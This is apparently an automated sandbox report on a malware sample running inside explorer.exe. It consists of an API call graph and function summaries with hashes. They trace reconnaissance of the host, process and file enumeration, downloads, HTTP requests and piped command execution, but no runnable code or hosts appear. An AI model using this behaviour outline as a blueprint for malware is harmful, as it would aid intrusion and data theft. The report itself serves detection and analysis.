3 API calls 4379->4380 4388 2e077e0 4379->4388 4381 2e0782a wsprintfW 4380->4381 4382 2e082b4 NtFreeVirtualMemory 4381->4382 4383 2e0784f 4382->4383 4384 2e07874 MultiByteToWideChar 4383->4384 4385 2e07a84 21 API calls 4384->4385 4386 2e078b9 4385->4386 4387 2e078d9 MultiByteToWideChar 4386->4387 4387->4388 4389 2e0790d 4387->4389 4388->4337 4389->4388 4578 2e0b9a0 4389->4578 4392 2e0b388 NtAllocateVirtualMemory 4391->4392 4393 2e02d94 4392->4393 4394 2e0be64 3 API calls 4393->4394 4395 2e02ddd 4394->4395 4396 2e02de9 Process32First 4395->4396 4397 2e031fb 4395->4397 4398 2e02e13 Process32Next 4396->4398 4399 2e02e34 4396->4399 4400 2e0be64 3 API calls 4397->4400 4398->4398 4398->4399 4402 2e0b388 NtAllocateVirtualMemory 4399->4402 4401 2e0320c 4400->4401 4401->4337 4403 2e02e44 Process32First 4402->4403 4404 2e02e60 4403->4404 4405 2e02ead Process32First 4403->4405 4406 2e02e68 Process32Next 4404->4406 4407 2e031e6 4405->4407 4412 2e02ec8 4405->4412 4406->4405 4406->4406 4408 2e082b4 NtFreeVirtualMemory 4407->4408 4409 2e031f0 CloseHandle 4408->4409 4409->4397 4410 2e031cb Process32Next 4410->4407 4410->4412 4411 2e0be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4411->4412 4412->4410 4412->4411 4413 2e02fe0 wsprintfA 4412->4413 4414 2e0be64 3 API calls 4413->4414 4416 2e0300d 4414->4416 4415 2e0be64 3 API calls 4415->4416 4416->4415 4417 2e03086 wsprintfA 4416->4417 4418 2e0be64 3 API calls 4417->4418 4421 2e030b3 4418->4421 4420 2e0be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4420->4421 4421->4420 4422 2e0be64 3 API calls 4421->4422 4587 2e0260c CreateToolhelp32Snapshot 4421->4587 4422->4410 4423->4337 4425 2e0b388 NtAllocateVirtualMemory 4424->4425 4426 2e02b3b 4425->4426 4427 2e0be64 3 API calls 4426->4427 4428 2e02b7b 4427->4428 4603 2e08398 4428->4603 4430 2e02cf3 4431 2e082b4 NtFreeVirtualMemory 4430->4431 4433 2e02d05 4430->4433 4431->4433 4432 2e02b8e 4432->4430 4434 2e0be64 3 API calls 4432->4434 4435 2e0be64 3 API calls 4433->4435 4436 2e02bda FindFirstFileA 4434->4436 4437 2e02d40 4435->4437 4436->4430 4441 2e02bfe 4436->4441 4437->4337 4438 2e02ccd FindNextFileA 4439 2e02ce8 FindClose 4438->4439 4438->4441 4439->4430 4440 2e0be64 3 API calls 4440->4441 4441->4438 4441->4440 4442 2e02c98 wsprintfA 4441->4442 4443 2e0be64 3 API calls 4442->4443 4443->4441 4445 2e07e17 4444->4445 4446 2e07e24 MultiByteToWideChar 4445->4446 4447 2e07a84 21 API calls 4446->4447 4448 2e07e75 4447->4448 4449 2e0b388 NtAllocateVirtualMemory 4448->4449 4454 2e07f40 4448->4454 4450 2e07eb6 4449->4450 4451 2e0b388 NtAllocateVirtualMemory 4450->4451 4452 2e07ed9 CreateThread 4451->4452 4453 2e082b4 NtFreeVirtualMemory 4452->4453 4453->4454 4454->4337 4456 2e07f6f 4455->4456 4457 2e07f7c MultiByteToWideChar 4456->4457 4458 2e07a84 21 API calls 4457->4458 4459 2e07fcd 4458->4459 4460 2e0b388 NtAllocateVirtualMemory 4459->4460 4467 2e080a4 4459->4467 4461 2e0800e 4460->4461 4611 2e0c7dc 4461->4611 4464 2e0b388 NtAllocateVirtualMemory 4465 2e0803d CreateThread 4464->4465 4466 2e082b4 NtFreeVirtualMemory 4465->4466 4466->4467 4467->4337 4473 2e04a2c 4468->4473 4469 2e04acc 4469->4337 4470 2e04aec MultiByteToWideChar 4471 2e0830c 4 API calls 4470->4471 4471->4473 4472 2e04b7d MultiByteToWideChar 4472->4473 4473->4469 4473->4470 4473->4472 4474 2e04bd6 wsprintfW 4473->4474 4475 2e07a84 21 API calls 4474->4475 4475->4473 4477 2e07ac4 4476->4477 4483 2e07b28 4477->4483 4484 2e0c00c NtAllocateVirtualMemory 4477->4484 4487 2e0900c 4477->4487 4507 2e076d8 4477->4507 4519 2e08240 4477->4519 4479 2e07c68 4479->4350 4479->4353 4480 2e082b4 NtFreeVirtualMemory 4481 2e07c5d 4480->4481 4481->4479 4482 2e082b4 NtFreeVirtualMemory 4481->4482 4482->4479 4483->4480 4483->4481 4484->4477 4488 2e0904b InternetOpenW 4487->4488 4489 2e09086 4488->4489 4490 2e0908b 4488->4490 4493 2e09248 4489->4493 4494 2e0923d InternetCloseHandle 4489->4494 4525 2e055dc 4490->4525 4495 2e09250 InternetCloseHandle 4493->4495 4496 2e0925b 4493->4496 4494->4493 4495->4496 4496->4477 4497 2e090f4 4499 2e09106 4497->4499 4500 2e082b4 NtFreeVirtualMemory 4497->4500 4501 2e09118 InternetOpenUrlW 4499->4501 4502 2e082b4 NtFreeVirtualMemory 4499->4502 4500->4499 4501->4489 4504 2e09154 4501->4504 4502->4501 4503 2e0915f InternetReadFile 4503->4504 4504->4489 4504->4503 4505 2e0b388 NtAllocateVirtualMemory 4504->4505 4506 2e0b648 3 API calls 4504->4506 4505->4504 4506->4504 4547 2e092f8 4507->4547 4512 2e0774e 4515 2e082b4 NtFreeVirtualMemory 4512->4515 4518 2e076fb 4512->4518 4513 2e0bf78 3 API calls 4514 2e07729 4513->4514 4514->4512 4516 2e0772d 4514->4516 4515->4518 4517 2e082b4 NtFreeVirtualMemory 4516->4517 4517->4518 4518->4477 4559 2e080b8 4519->4559 4522 2e0827f 4522->4477 4526 2e05614 4525->4526 4527 2e0b388 NtAllocateVirtualMemory 4526->4527 4528 2e0563a 4527->4528 4529 2e0b388 NtAllocateVirtualMemory 4528->4529 4530 2e05650 InternetCrackUrlW 4529->4530 4531 2e056ac 4530->4531 4535 2e056c6 4530->4535 4532 2e082b4 NtFreeVirtualMemory 4531->4532 4533 2e056b9 4532->4533 4534 2e082b4 NtFreeVirtualMemory 4533->4534 4534->4535 4535->4489 4535->4497 4536 2e0c860 4535->4536 4537 2e0c894 InternetConnectW 4536->4537 4541 2e0c8df 4536->4541 4538 2e0c8e4 HttpOpenRequestW 4537->4538 4537->4541 4538->4541 4542 2e0c936 HttpSendRequestW 4538->4542 4539 2e0c9e0 4543 2e0c9f3 4539->4543 4544 2e0c9e8 InternetCloseHandle 4539->4544 4540 2e0c9d5 InternetCloseHandle 4540->4539 4541->4539 4541->4540 4545 2e0c955 InternetQueryOptionW InternetSetOptionW 4542->4545 4546 2e0c9a7 HttpSendRequestW 4542->4546 4543->4497 4544->4543 4545->4546 4546->4541 4548 2e0c00c NtAllocateVirtualMemory 4547->4548 4550 2e09318 4548->4550 4549 2e076f7 4549->4518 4552 2e0bf78 4549->4552 4550->4549 4551 2e082b4 NtFreeVirtualMemory 4550->4551 4551->4549 4553 2e0bf90 4552->4553 4556 2e0bf0c 4553->4556 4555 2e07713 4555->4512 4555->4513 4557 2e0b704 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4556->4557 4558 2e0bf40 4557->4558 4558->4555 4560 2e080f9 4559->4560 4561 2e0810b RtlInitUnicodeString NtCreateFile 4560->4561 4562 2e081b1 4561->4562 4562->4522 4563 2e081c8 NtWriteFile 4562->4563 4564 2e08230 NtClose 4563->4564 4564->4522 4566 2e0b470 4565->4566 4567 2e08326 SHGetFolderPathW 4566->4567 4568 2e0834f 4567->4568 4569 2e0c00c NtAllocateVirtualMemory 4568->4569 4570 2e0835b 4569->4570 4571 2e08368 4570->4571 4572 2e0bf78 3 API calls 4570->4572 4571->4361 4572->4571 4574 2e0b8ee 4573->4574 4575 2e0b926 CreateProcessW 4574->4575 4576 2e0b97a CloseHandle CloseHandle 4575->4576 4577 2e0b976 4575->4577 4576->4577 4577->4360 4579 2e0b9c0 4578->4579 4580 2e0ba78 4579->4580 4581 2e0ba1e 4579->4581 4583 2e0baad wsprintfW 4580->4583 4582 2e0ba53 wsprintfW 4581->4582 4584 2e0bac8 CreateProcessW 4582->4584 4583->4584 4585 2e0bb1b 4584->4585 4586 2e0bb1f CloseHandle CloseHandle 4584->4586 4585->4388 4586->4585 4588 2e02659 Process32First 4587->4588 4589 2e0297e 4587->4589 4588->4589 4592 2e0267f 4588->4592 4589->4421 4590 2e02963 Process32Next 4590->4589 4590->4592 4591 2e0be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4591->4592 4592->4590 4592->4591 4593 2e0279f wsprintfA 4592->4593 4594 2e0be64 3 API calls 4593->4594 4596 2e027cf 4594->4596 4595 2e0be64 3 API calls 4595->4596 4596->4595 4597 2e02839 wsprintfA 4596->4597 4598 2e0be64 3 API calls 4597->4598 4601 2e02869 4598->4601 4599 2e0be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4599->4601 4600 2e0260c 3 API calls 4600->4601 4601->4599 4601->4600 4602 2e0be64 3 API calls 4601->4602 4602->4590 4604 2e0b470 4603->4604 4605 2e083b2 SHGetFolderPathA 4604->4605 4606 2e083db 4605->4606 4607 2e0bfc0 NtAllocateVirtualMemory 4606->4607 4608 2e083e7 4607->4608 4609 2e083f4 4608->4609 4610 2e0be64 3 API calls 4608->4610 4609->4432 4610->4609 4612 2e08033 4611->4612 4613 2e0c7ef 4611->4613 4612->4464 4614 2e0b388 NtAllocateVirtualMemory 4613->4614 4614->4612 4616 2e04411 4615->4616 4617 2e0bfc0 NtAllocateVirtualMemory 4616->4617 4621 2e04444 4617->4621 4618 2e04451 4619 2e044a4 4620 2e082b4 NtFreeVirtualMemory 4619->4620 4620->4618 4621->4618 4621->4619 4622 2e0448f MessageBoxA 4621->4622 4622->4619 4702 2e0bb44 4703 2e0bbc5 4702->4703 4704 2e0bb62 4702->4704 4705 2e0bb8e CreateFileMappingA 4704->4705 4705->4703 4706 2e0bbcc MapViewOfFile 4705->4706 4706->4703 4708 2e0bbff 4706->4708 4707 2e0bcd5 VirtualFree 4709 2e082b4 NtFreeVirtualMemory 4707->4709 4708->4707 4710 2e0b388 NtAllocateVirtualMemory 4708->4710 4711 2e0bd06 UnmapViewOfFile CloseHandle 4709->4711 4712 2e0bc35 4710->4712 4711->4703 4713 2e0be64 3 API calls 4712->4713 4714 2e0bc87 4713->4714 4715 2e0be64 3 API calls 4714->4715 4716 2e0bc99 4715->4716 4717 2e0bfc0 NtAllocateVirtualMemory 4716->4717 4718 2e0bcaf 4717->4718 4719 2e082b4 NtFreeVirtualMemory 4718->4719 4720 2e0bccb 4719->4720 4721 2e082b4 NtFreeVirtualMemory 4720->4721 4721->4707 4761 2e04384 4762 2e043a5 4761->4762 4763 2e043a7 4761->4763 4764 2e043c4 129 API calls 4763->4764 4764->4762 4765 2e03304 4766 2e03349 4765->4766 4821 2e03322 4765->4821 4767 2e0b388 NtAllocateVirtualMemory 4766->4767 4768 2e03353 4767->4768 4768->4821 4883 2e02164 4768->4883 4770 2e03406 4771 2e02164 21 API calls 4770->4771 4772 2e0349e 4771->4772 4773 2e02164 21 API calls 4772->4773 4774 2e03537 4773->4774 4775 2e02164 21 API calls 4774->4775 4776 2e035d0 4775->4776 4777 2e02164 21 API calls 4776->4777 4778 2e03669 4777->4778 4779 2e02164 21 API calls 4778->4779 4780 2e03702 4779->4780 4781 2e02164 21 API calls 4780->4781 4782 2e0379b 4781->4782 4783 2e02164 21 API calls 4782->4783 4784 2e03834 4783->4784 4785 2e02164 21 API calls 4784->4785 4786 2e038cd 4785->4786 4787 2e02164 21 API calls 4786->4787 4788 2e03966 4787->4788 4789 2e02164 21 API calls 4788->4789 4790 2e039ff 4789->4790 4791 2e0b388 NtAllocateVirtualMemory 4790->4791 4792 2e03a12 4791->4792 4793 2e03ad6 4792->4793 4794 2e06fc0 NtAllocateVirtualMemory 4792->4794 4792->4821 4795 2e06fc0 NtAllocateVirtualMemory 4793->4795 4796 2e03b77 4793->4796 4803 2e03a63 4794->4803 4805 2e03b04 4795->4805 4797 2e06fc0 NtAllocateVirtualMemory 4796->4797 4798 2e03c18 4796->4798 4807 2e03ba5 4797->4807 4799 2e06fc0 NtAllocateVirtualMemory 4798->4799 4800 2e03cb9 4798->4800 4813 2e03c46 4799->4813 4801 2e06fc0 NtAllocateVirtualMemory 4800->4801 4802 2e03d5a 4800->4802 4816 2e03ce7 4801->4816 4804 2e03dfb 4802->4804 4806 2e06fc0 NtAllocateVirtualMemory 4802->4806 4803->4793 4812 2e0be64 3 API calls 4803->4812 4808 2e06fc0 NtAllocateVirtualMemory 4804->4808 4809 2e03e9c 4804->4809 4805->4796 4815 2e0be64 3 API calls 4805->4815 4823 2e03d88 4806->4823 4807->4798 4826 2e0be64 3 API calls 4807->4826 4830 2e03e29 4808->4830 4810 2e03f3d 4809->4810 4814 2e06fc0 NtAllocateVirtualMemory 4809->4814 4817 2e06fc0 NtAllocateVirtualMemory 4810->4817 4820 2e03fde 4810->4820 4811 2e04138 4905 2e02988 4811->4905 4818 2e03abd 4812->4818 4813->4800 4828 2e0be64 3 API calls 4813->4828 4834 2e03eca 4814->4834 4824 2e03b5e 4815->4824 4816->4802 4837 2e0be64 3 API calls 4816->4837 4843 2e03f6b 4817->4843 4827 2e0be64 3 API calls 4818->4827 4822 2e06fc0 NtAllocateVirtualMemory 4820->4822 4825 2e0408b 4820->4825 4846 2e0400c 4822->4846 4823->4804 4840 2e0be64 3 API calls 4823->4840 4829 2e0be64 3 API calls 4824->4829 4825->4811 4831 2e06fc0 NtAllocateVirtualMemory 4825->4831 4832 2e03bff 4826->4832 4833 2e03acc 4827->4833 4835 2e03ca0 4828->4835 4836 2e03b6d 4829->4836 4830->4809 4849 2e0be64 3 API calls 4830->4849 4855 2e040b9 4831->4855 4838 2e0be64 3 API calls 4832->4838 4839 2e082b4 NtFreeVirtualMemory 4833->4839 4834->4810 4852 2e0be64 3 API calls 4834->4852 4841 2e0be64 3 API calls 4835->4841 4842 2e082b4 NtFreeVirtualMemory 4836->4842 4844 2e03d41 4837->4844 4845 2e03c0e 4838->4845 4839->4793 4847 2e03de2 4840->4847 4848 2e03caf 4841->4848 4842->4796 4843->4820 4860 2e0be64 3 API calls 4843->4860 4850 2e0be64 3 API calls 4844->4850 4851 2e082b4 NtFreeVirtualMemory 4845->4851 4846->4825 4863 2e0be64 3 API calls 4846->4863 4853 2e0be64 3 API calls 4847->4853 4854 2e082b4 NtFreeVirtualMemory 4848->4854 4856 2e03e83 4849->4856 4857 2e03d50 4850->4857 4851->4798 4858 2e03f24 4852->4858 4859 2e03df1 4853->4859 4854->4800 4855->4811 4870 2e0be64 3 API calls 4855->4870 4861 2e0be64 3 API calls 4856->4861 4862 2e082b4 NtFreeVirtualMemory 4857->4862 4864 2e0be64 3 API calls 4858->4864 4865 2e082b4 NtFreeVirtualMemory 4859->4865 4866 2e03fc5 4860->4866 4867 2e03e92 4861->4867 4862->4802 4868 2e0406c 4863->4868 4869 2e03f33 4864->4869 4865->4804 4871 2e0be64 3 API calls 4866->4871 4872 2e082b4 NtFreeVirtualMemory 4867->4872 4873 2e0be64 3 API calls 4868->4873 4874 2e082b4 NtFreeVirtualMemory 4869->4874 4875 2e04119 4870->4875 4876 2e03fd4 4871->4876 4872->4809 4877 2e0407e 4873->4877 4874->4810 4878 2e0be64 3 API calls 4875->4878 4879 2e082b4 NtFreeVirtualMemory 4876->4879 4880 2e082b4 NtFreeVirtualMemory 4877->4880 4881 2e0412b 4878->4881 4879->4820 4880->4825 4882 2e082b4 NtFreeVirtualMemory 4881->4882 4882->4811 4884 2e021e4 4883->4884 4885 2e021f6 6 API calls 4884->4885 4931 2e02134 4885->4931 4887 2e02333 CreateProcessW 4888 2e0b388 NtAllocateVirtualMemory 4887->4888 4889 2e02399 4888->4889 4890 2e0b388 NtAllocateVirtualMemory 4889->4890 4898 2e023d6 4890->4898 4891 2e025e8 4892 2e025fa 4891->4892 4895 2e082b4 NtFreeVirtualMemory 4891->4895 4892->4770 4893 2e025a0 TerminateProcess CloseHandle CloseHandle CloseHandle CloseHandle 4893->4891 4894 2e02401 PeekNamedPipe 4896 2e024b9 PeekNamedPipe 4894->4896 4894->4898 4895->4892 4897 2e02569 GetExitCodeProcess 4896->4897 4896->4898 4897->4898 4899 2e0258f 4897->4899 4898->4891 4898->4893 4898->4894 4898->4896 4898->4897 4900 2e02468 ReadFile 4898->4900 4903 2e02518 ReadFile 4898->4903 4932 2e0c704 NtDelayExecution 4898->4932 4899->4893 4902 2e0be64 3 API calls 4900->4902 4902->4896 4904 2e0be64 3 API calls 4903->4904 4904->4897 4906 2e0299d 4905->4906 4930 2e02b17 4905->4930 4907 2e029ca 4906->4907 4908 2e082b4 NtFreeVirtualMemory 4906->4908 4906->4930 4909 2e029ea 4907->4909 4910 2e082b4 NtFreeVirtualMemory 4907->4910 4908->4907 4911 2e02a0a 4909->4911 4912 2e082b4 NtFreeVirtualMemory 4909->4912 4910->4909 4913 2e02a2a 4911->4913 4914 2e082b4 NtFreeVirtualMemory 4911->4914 4912->4911 4915 2e02a4a 4913->4915 4916 2e082b4 NtFreeVirtualMemory 4913->4916 4914->4913 4917 2e082b4 NtFreeVirtualMemory 4915->4917 4918 2e02a6a 4915->4918 4916->4915 4917->4918 4919 2e02a8a 4918->4919 4920 2e082b4 NtFreeVirtualMemory 4918->4920 4921 2e02aaa 4919->4921 4922 2e082b4 NtFreeVirtualMemory 4919->4922 4920->4919 4923 2e02aca 4921->4923 4924 2e082b4 NtFreeVirtualMemory 4921->4924 4922->4921 4925 2e02aea 4923->4925 4926 2e082b4 NtFreeVirtualMemory 4923->4926 4924->4923 4927 2e02b0a 4925->4927 4929 2e082b4 NtFreeVirtualMemory 4925->4929 4926->4925 4928 2e082b4 NtFreeVirtualMemory 4927->4928 4928->4930 4929->4927 4930->4821 4931->4887 4932->4898 4623 2e08a58 4624 2e08a79 4623->4624 4626 2e08a72 4623->4626 4625 2e08b63 GetProcAddress GetProcAddressForCaller 4624->4625 4624->4626 4625->4626 4722 2e07528 4723 2e07548 4722->4723 4724 2e0754f 4722->4724 4724->4723 4725 2e06fc0 NtAllocateVirtualMemory 4724->4725 4726 2e076a7 4725->4726 4728 2e0c734 4726->4728 4729 2e0c74a 4728->4729 4730 2e0c74f 4728->4730 4729->4723 4731 2e0b388 NtAllocateVirtualMemory 4730->4731 4731->4729 4752 2e044b8 4755 2e043c4 4752->4755 4756 2e041b4 129 API calls 4755->4756 4757 2e043cd 4756->4757 4758 2e043eb 4757->4758 4760 2e0c704 NtDelayExecution 4757->4760 4760->4757 4645 2e0696b 4670 2e05b7a new[] 4645->4670 4646 2e069a2 GetExitCodeThread 4646->4670 4647 2e069de GetExitCodeThread 4647->4670 4648 2e05ba7 4649 2e0b388 NtAllocateVirtualMemory 4649->4670 4650 2e0c704 NtDelayExecution 4650->4670 4651 2e05484 3 API calls 4651->4670 4652 2e0be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4652->4670 4653 2e06fc0 NtAllocateVirtualMemory 4653->4670 4654 2e06404 wsprintfA 4654->4670 4655 2e06025 wsprintfA 4655->4670 4656 2e05f36 wsprintfA 4656->4670 4657 2e0bfc0 NtAllocateVirtualMemory 4657->4670 4658 2e08424 11 API calls 4658->4670 4659 2e082b4 NtFreeVirtualMemory 4659->4670 4660 2e0b770 NtAllocateVirtualMemory 4660->4670 4661 2e0b388 NtAllocateVirtualMemory 4663 2e06187 WideCharToMultiByte 4661->4663 4662 2e0b388 NtAllocateVirtualMemory 4665 2e06243 WideCharToMultiByte 4662->4665 4666 2e0be64 3 API calls 4663->4666 4664 2e0b388 NtAllocateVirtualMemory 4667 2e062ff WideCharToMultiByte 4664->4667 4668 2e0be64 3 API calls 4665->4668 4666->4670 4669 2e0be64 3 API calls 4667->4669 4668->4670 4669->4670 4670->4646 4670->4647 4670->4648 4670->4649 4670->4650 4670->4651 4670->4652 4670->4653 4670->4654 4670->4655 4670->4656 4670->4657 4670->4658 4670->4659 4670->4660 4670->4661 4670->4662 4670->4664 4671 2e04e28 14 API calls 4670->4671 4672 2e08bdc GetCursorPos GetTickCount RtlRandom 4670->4672 4673 2e06cfc NtAllocateVirtualMemory 4670->4673 4674 2e05734 73 API calls 4670->4674 4671->4670 4672->4670 4673->4670 4674->4670 4732 2e0922b 4733 2e09086 4732->4733 4734 2e0904b InternetOpenW 4732->4734 4736 2e09248 4733->4736 4737 2e0923d InternetCloseHandle 4733->4737 4734->4733 4735 2e0908b 4734->4735 4738 2e055dc 3 API calls 4735->4738 4739 2e09250 InternetCloseHandle 4736->4739 4740 2e0925b 4736->4740 4737->4736 4741 2e090ca 4738->4741 4739->4740 4741->4733 4742 2e090f4 4741->4742 4743 2e0c860 8 API calls 4741->4743 4744 2e09106 4742->4744 4745 2e082b4 NtFreeVirtualMemory 4742->4745 4743->4742 4746 2e09118 InternetOpenUrlW 4744->4746 4747 2e082b4 NtFreeVirtualMemory 4744->4747 4745->4744 4746->4733 4749 2e09154 4746->4749 4747->4746 4748 2e0915f InternetReadFile 4748->4749 4749->4733 4749->4748 4750 2e0b388 NtAllocateVirtualMemory 4749->4750 4751 2e0b648 3 API calls 4749->4751 4750->4749 4751->4749 4675 2e0b86c 4676 2e0b880 4675->4676 4679 2e0b8c6 4675->4679 4677 2e0b89e VirtualFree 4676->4677 4678 2e082b4 NtFreeVirtualMemory 4677->4678 4678->4679 4627 2e0545d 4628 2e05265 4627->4628 4629 2e053a4 4627->4629 4632 2e05315 4628->4632 4634 2e05292 4628->4634 4630 2e05479 4629->4630 4631 2e082b4 NtFreeVirtualMemory 4629->4631 4631->4630 4633 2e0532e HttpOpenRequestA 4632->4633 4637 2e0539c 4633->4637 4635 2e052c7 HttpOpenRequestA 4634->4635 4635->4637 4637->4629 4638 2e053b3 InternetSetOptionA 4637->4638 4639 2e053d6 4637->4639 4638->4639 4640 2e05424 HttpSendRequestA 4639->4640 4643 2e053e0 4639->4643 4641 2e05443 4640->4641 4641->4629 4642 2e082b4 NtFreeVirtualMemory 4641->4642 4642->4629 4644 2e053fb HttpSendRequestA 4643->4644 4644->4641

                                                                                                                                            Executed Functions

                                                                                                                                            Function 02E08424 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 202COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 0 2e08424-2e0845d call 2e0b388 3 2e08466-2e08487 GetAdaptersInfo 0->3 4 2e0845f-2e08461 0->4 5 2e08676-2e0867c 3->5 6 2e0848d-2e084c0 call 2e0b388 GetAdaptersInfo call 2e0b4cc 3->6 7 2e087ea-2e087f1 4->7 9 2e08688-2e086a6 call 2e0b388 5->9 10 2e0867e-2e08683 call 2e082b4 5->10 16 2e084c5-2e084c8 6->16 17 2e087e5 9->17 18 2e086ac-2e086c3 GetComputerNameExA 9->18 10->9 19 2e084d9-2e084e1 16->19 20 2e084ca-2e084d7 16->20 17->7 21 2e086c5-2e086dc call 2e0b4cc 18->21 22 2e08729-2e08740 GetComputerNameExA 18->22 23 2e084e6-2e084fe wsprintfA 19->23 20->23 34 2e086ed-2e086f5 21->34 35 2e086de-2e086eb 21->35 25 2e08746-2e0874b 22->25 26 2e087db-2e087e0 call 2e082b4 22->26 29 2e08502-2e0850a 23->29 27 2e0875c-2e08763 25->27 28 2e0874d-2e0875a 25->28 26->17 32 2e0876b-2e08782 call 2e0b4cc 27->32 28->32 33 2e08516-2e08525 29->33 45 2e08784-2e08794 32->45 46 2e08796-2e0879e 32->46 37 2e085f2-2e08609 call 2e0b4cc 33->37 38 2e0852b-2e08530 33->38 39 2e086fa-2e08725 wsprintfA 34->39 35->39 51 2e0861a-2e08622 37->51 52 2e0860b-2e08618 37->52 42 2e08532-2e08549 call 2e0b4cc 38->42 43 2e08573-2e0858a call 2e0b4cc 38->43 39->22 57 2e0855a-2e08562 42->57 58 2e0854b-2e08558 42->58 54 2e0859b-2e085a3 43->54 55 2e0858c-2e08599 43->55 50 2e087a6-2e087d7 wsprintfA 45->50 46->50 50->26 56 2e08627-2e08659 wsprintfA 51->56 52->56 60 2e085a8-2e085ad 54->60 55->60 61 2e0865b 56->61 62 2e0865d-2e08670 56->62 59 2e08567-2e08571 57->59 58->59 63 2e085b2-2e085ed wsprintfA 59->63 60->63 61->5 62->5 62->29 63->33
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 02E0B388: NtAllocateVirtualMemory.NTDLL ref: 02E0B3BE
                                                                                                                                            • GetAdaptersInfo.IPHLPAPI ref: 02E08470
                                                                                                                                            • GetAdaptersInfo.IPHLPAPI ref: 02E084A7
                                                                                                                                            • wsprintfA.USER32 ref: 02E084F0
                                                                                                                                            • wsprintfA.USER32 ref: 02E085DB
                                                                                                                                            • wsprintfA.USER32 ref: 02E0863F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
                                                                                                                                            • String ID: o
                                                                                                                                            • API String ID: 2074107575-252678980
                                                                                                                                            • Opcode ID: 297d1a7e7ca8095e50a572676fb4cd9321a35f6664537050dc1b6cbbb83bb27f
                                                                                                                                            • Instruction ID: 16033ffbfb052ad992aff4511662411a63a2f30d24211c2c28bdb0df3185178f
                                                                                                                                            • Opcode Fuzzy Hash: 297d1a7e7ca8095e50a572676fb4cd9321a35f6664537050dc1b6cbbb83bb27f
                                                                                                                                            • Instruction Fuzzy Hash: 84A1EA72249B8486DB70CB14F48439AB7A1F788788F445529EACE83B69EF7CC595CF40
                                                                                                                                            Function 02E07274 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 162 2e07274-2e072ab GetAdaptersInfo 163 2e072f8-2e072fe 162->163 164 2e072ad-2e072cd call 2e0b388 GetAdaptersInfo 162->164 166 2e07300-2e07305 call 2e082b4 163->166 167 2e0730a 163->167 171 2e072d1-2e072dd 164->171 166->167 168 2e0730f-2e07313 167->168 172 2e072e3-2e072f6 171->172 173 2e072df-2e072e1 171->173 172->163 172->171 173->168
                                                                                                                                            APIs
                                                                                                                                            • GetAdaptersInfo.IPHLPAPI ref: 02E0729C
                                                                                                                                              • Part of subcall function 02E0B388: NtAllocateVirtualMemory.NTDLL ref: 02E0B3BE
                                                                                                                                            • GetAdaptersInfo.IPHLPAPI ref: 02E072C7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AdaptersInfo$AllocateMemoryVirtual
                                                                                                                                            • String ID: o
                                                                                                                                            • API String ID: 2718687846-252678980
                                                                                                                                            • Opcode ID: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
                                                                                                                                            • Instruction ID: 526474109462dac7b5c04ff70e261f234159be9f6506191482446c468ca63a2b
                                                                                                                                            • Opcode Fuzzy Hash: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
                                                                                                                                            • Instruction Fuzzy Hash: BC01B0B2648B4486DB30DB15E49835EB7A0F3CC798F445225EA8D47BA8DB7CC686CF44
                                                                                                                                            Function 02E08D3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 174 2e08d3c-2e08d6c call 2e0b470 GetUserNameA 177 2e08d87-2e08d95 174->177 178 2e08d6e-2e08d81 wsprintfA 174->178 178->177
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: NameUserwsprintf
                                                                                                                                            • String ID: engineer
                                                                                                                                            • API String ID: 54179028-2484562649
                                                                                                                                            • Opcode ID: 0d2000033b4f6b77b7c63e69016060f77196b9a618d98f030aea10d94a3709f8
                                                                                                                                            • Instruction ID: 9ca248234d0c9e9ca0633c2d534aa159e9c00d4ac0ef5d99f3e81093ea6c48c0
                                                                                                                                            • Opcode Fuzzy Hash: 0d2000033b4f6b77b7c63e69016060f77196b9a618d98f030aea10d94a3709f8
                                                                                                                                            • Instruction Fuzzy Hash: D7F07D712A4AC7D2EB70DF14E8943AA6325FB91748FC06136A14D469A8EF7CC75BCB40
                                                                                                                                            Function 02E0A8E0 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
